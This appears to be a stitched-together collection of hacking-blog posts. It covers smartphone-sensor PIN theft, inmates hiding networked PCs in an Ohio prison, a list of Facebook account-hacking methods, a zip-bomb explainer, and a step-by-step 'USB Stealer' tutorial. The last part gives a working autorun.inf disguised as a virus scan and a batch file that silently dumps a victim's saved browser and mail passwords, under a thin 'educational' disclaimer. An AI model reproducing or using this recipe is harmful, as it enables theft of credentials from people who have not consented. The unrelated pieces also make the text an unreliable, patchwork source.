Researchers said their research was nothing but to raise awareness to those several sensors in a smartphone which apps can access without any permission, and for which vendors have not yet included any restrictions in their standard built-in permissions model.
"Despite the very real risks, when we asked people which sensors they were most concerned about we found a direct correlation between perceived risk and understanding," Mehrnezhad said. "So people were far more concerned about the camera and GPS than they were about the silent sensors."

Mehrnezhad says the team had alerted leading browser providers such as Google and Apple of the risks, and while some, including Mozilla and Safari, have partially fixed the issue, the team is still working with the industry to find an ideal solution.
More technical details can be found in the full research paper, titled "Stealing PINs via mobile sensors: actual risk versus user perception," published Tuesday in the International Journal of Information Security.

Ohio prisoners who built personal computers from parts


Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was the case of two Ohio prisoners who built personal computers from parts from e-waste, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday, following almost a year-long investigation. 
According to the report, a prison work program has backfired two inmates of Marion Correctional Institution in Ohio, Florida, who smuggled computer parts from an e-waste recycling workshop and built two clandestine computers out of them.
The unsupervised inmates later hid the computers behind a plywood board in the ceiling of a training room, and then connected those working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to access the Internet.
But once the inmates got online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, accessed websites with information about manufacturing drugs, weapons, and explosives, and apply for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software." 
The scheme was discovered after prison technology employee Gene Brady alerted about unusual levels of internet activity on a contractor's account on days when the employee was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.Leeshan McCullough – Chairman of aquaculture.Robert Cooper – Chairman of horticulture.Matthew Brown – Chairman of environmental education.Adam Johnston – Executive committee treasurer.All the five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.


"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."

The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.

10 Way Used by Hackers to hack Facebook account

10 Way Used by Hackers to hack Facebook account


I will show number of ways to Hack Facebook Account that all hackers usually use to hack Facebook Account. So beware from hackers and protect your facebook account from hackers. Our site provides only security tips to protect your facebook account from hackers . We sharing only these methods because if you know how to hack you must know how to secure. Must read carefully all these methods, beware from all attacks, and protect your facebook account from hackers.



Note :- This post is only for security purpose don't try any illigal activity and i'm just shared these methods because protect our facebook account from these types of hacking attacks.
Mostly Hackers use these methods to hack facebook account, So protect yourself from hackers. Must Read this post, and beware from hackers.



1. Hack Facebook Account Password By Phishing:-

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims "Email Address" and "Password" is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

2. Hack Facebook Account Password By Keylogging :-

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim's computer, will record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

3. Stealer's:-

Almost 80% percent people use stored passwords in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealer's are software's specially designed to capture the saved passwords stored in the victims Internet browser.

4. Hack Facebook Account Password By Session Hijacking :-

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims account. Session hijacking is widely used on LAN, and WiFi connections.

5. Sidejacking With Firesheep :-

Sidejacking attack went common in late 2010, however it's still popular now a days. Firesheep is widely used to carry out sidejacking attacks. Firesheep only works when the attacker and victim is on the same WiFi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards WiFi users.


6. Mobile Phone Hacking :-

Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are a lots of Mobile Spying software's used to monitor a Cellphone. The most popular Mobile Phone Spying software's are: Mobile Spy, and Spy Phone Gold.

7. DNS Spoofing :-

If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

8 USB Hacking :-

If an attacker has physical access to your computer, he could just insert a USB programmed with a function to automatically extract saved passwords in the Internet browser.

9. Man In the Middle Attacks :-

If the victim and attacker are on the same LAN and on a switch based network, a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

10. Botnets :-

Botnets are not commonly used for hacking Facebook accounts, because of it's high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.




Note:-Mostly hackers use these methods to hack facebook account password, We are shared this ways/post only for security purpose.

Introduced to zip Bomb

This post is about zip bomb and it's working. You will also get a gist of how petabytes of files are converted into smaller files of kilo or mega bytes. Now I will take you through some things that will really intrigue you. Let's get started straight away.
What's zip bomb?
A zip bomb also known as zip of death or decompression bomb, is a malicious archive file designed to crash or render useless the program or system reading it. It is open employed to disable antivirus software in order to crate opening for traditional types of viruses.
Rather than highjacking the normal operation of a program, the zip bomb allows a program to work as intended, the archive is carefully crafted so that unpacking it i.e if an antivirus scans the zip file for viruses, will require inordinate amount of time, disk space or memory.
But as everything it has certain limitations ofcourse. This zip file is a very tiny zip file most of them are measured in Kilobytes.
Now, you may have lots of questions like
1) Why is it so tiny?
2) Why call it a zip BOMB when it's so tiny?
3) How is it so small?
4) How does it work?

So here are your answers:
1) Why is it so tiny?
Zip bomb is a tiny zip file. Now it is made so tiny to avoid suspicion. It's obvious aint it? You dont want tell the police you are a thief, you make it look different. It is made tiny because of compression of huge amount of data and the reason it being tiny makes using it a "pure hacker like mentality"
2) Why call it a zip BOMB when it's so tiny?
Never judge a book by it's cover. Never underestimate smaller one's. It is called zip bomb or zip of death becasue it contains upto terabytes, petabytes or even exabytes of data.That's the key to clear out malware and hence blocking every obstacle in it's path leaving a straight Asphalt. Now you will certainly want to know, how is it possible to complete such large a files into a zip file of such small size. Don't worry you will get your answers further. A simple example of a zip bomb is the file 42.zip, which is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom layer archive containing a 4.3-gigabyte (4 294 967 295 bytes; ~ 3.99 GiB) file for a total of 4.5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PiB) of uncompressed data. This file is still available for download on various websites across the Internet. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out-of-memory condition, or exceed an acceptable amount of program execution time. Zip bombs often (if not always) rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level, effectively converting their exponential growth to linear. There are also zip files that, when uncompressed, yield identical copies of themselves.
3) How is it so small?
Nowadays various compression tools make us of term called "looseless compression algorithm". As the name suggests this algorithm strives to compress files without any loss of information, which is very important of course. We dont want to lose any information while we compress files. To show how this zip file works, let me tal about it's simple principle. Computer only understands binary language i.e 0's and 1's. So every file in order to be understood by a computer must in binary i.e 0,1 format. If we take a binary number "0 1 0 0 0 1 1 1" and let's say we have a tool to compress it to a number like "0 1 3 0 3 1"? The same logic apllies here. In the initail binary number there were 3 o's and 3 1's starting from 3rd digit. we just replaced it with 30 and 31. Now this might not be the exact logic that governs the compression but correct upto a certain extent. Thus the zip bomb which will contain only 0's and 1's will work in this way making copies of some files again and again and compressing them into a single zip file resulting it to throw up data of about terabytes, petabyte or exabytes.
Make a text file with only o's and 1's. Make a copy of it.
Type upto 1000 zeros and just do "Ctrl+a", "Ctrl+c","Ctrl+v".
Do it until the text file begins to lag.
The size should be more than 1 Gigabyte.
Then compress it and see the magic. The compressed file will be arond 1 Megabyte.
4) How does it work?
Zip bomb contains about petabytes of data, this if an antivirus tries to scan it, it will start to decompress it first. But just imagine what will happen if a file of about a kilobyte is decompressed and we get a file of about a few or more petabytes. The answers simple, before the zip file is completely scanned the antivirus will crash, creating a loophole for attackers.
,

USB Stealer

Windows allows the storage of the passwords, as do modern browsers. While this feature is convenient for users, it has imposed itself as a big security risk among organizations. We know that browsers store most passwords on daily basis, like MSN messenger, Yahoo, Facebook passwords, etc. Most people lack time and ask their browsers to save their passwords. As we know, there are many tools available to recover saved passwords, so in this article I will explain to you how to make aUSB passwordstealer and steal saved passwords.
Just to explain the concept, we are going to collect some password stealing tools, tools that are freely available on the internet and capable of stealing the passwords stored in the browsers or other windows files.
Then, we create a batch program that will execute these combined programs and store the stolen usernames and passwords in a text file.
To further spice up the penetration testing demonstration, we will also make this batch file execute as an auto-run for the USB stick, effectively stealing the passwords as we plug it in.
THINGS YOU WILL NEED
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications.
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express, windows mail, POP3, etc.
IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) - Protected Storage Passview is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express, and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
ChromePass - ChromePass is a small password recovery tool that allows you to view the usernames and passwords stored by Google Chrome Web browser.
STEPS :
1. First of all download all 5 tools and copy the executables (.exe files) i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into yourUSB Drive.
2. Create a new Notepad and input the following text:
[autorun] open=launch.bat ACTION= Perform a Virus Scan
Save the Notepad and rename it from "New Text Document.txt" to "autorun.inf"
Now copy the "autorun.inf" file onto yourUSB Stick.
3. Create another Notepad and write the following text onto
it:
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt
4. Save the Notepad and rename it from "New Text Document.txt" to "launch.bat"
5. Copy the "launch.bat" file onto your USBdrive. Now your USB Password stealer is ready, all you have to do is insert it in your victim's computer and a popup will appear. In the popup window, select the option "launch virus scan."
After this you can see saved password in .TXT files
Purely for educational purposes. Use these tools at your own risk!
,